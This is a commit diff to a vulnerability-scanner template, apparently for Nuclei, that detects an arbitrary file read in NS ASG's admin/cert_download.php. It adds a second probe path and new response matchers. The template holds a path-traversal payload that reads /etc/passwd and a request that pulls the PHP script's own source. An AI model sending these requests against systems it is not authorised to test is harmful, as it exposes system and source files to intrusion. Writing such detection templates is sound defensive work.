Update ns-asg-file-read.yaml

vulnerabilities/other/ns-asg-file-read.yaml

@@ -2,7 +2,7 @@ id: nsasg-arbitrary-file-read
 
 info:
   name: NS ASG Arbitrary File Read
-  author: pikpikcu
+  author: pikpikcu, ritikchaddha
   severity: high
   reference: https://zhuanlan.zhihu.com/p/368054963
   tags: nsasg,lfi
@@ -11,6 +11,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php"
 
     matchers-condition: and
     matchers:
@@ -18,6 +19,12 @@ requests:
       - type: regex
         regex:
           - "root:.*:0:0:"
+         
+      - type: word
+        part: body
+        words:
+          - "$certfile"
+          - "application/pdf"
 
       - type: status
         status: